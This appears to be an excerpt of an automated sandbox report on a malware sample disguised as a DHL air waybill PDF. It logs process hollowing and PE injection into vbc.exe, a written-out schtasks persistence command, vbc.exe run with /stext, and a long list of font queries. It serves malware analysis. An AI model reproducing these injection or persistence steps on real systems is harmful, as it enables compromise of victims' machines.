            HIPS / PFW / Operating System Protection Evasion:

            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 20F008
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 365008
            .NET source code references suspicious native API functions
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmp Binary or memory string: ProgMan
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
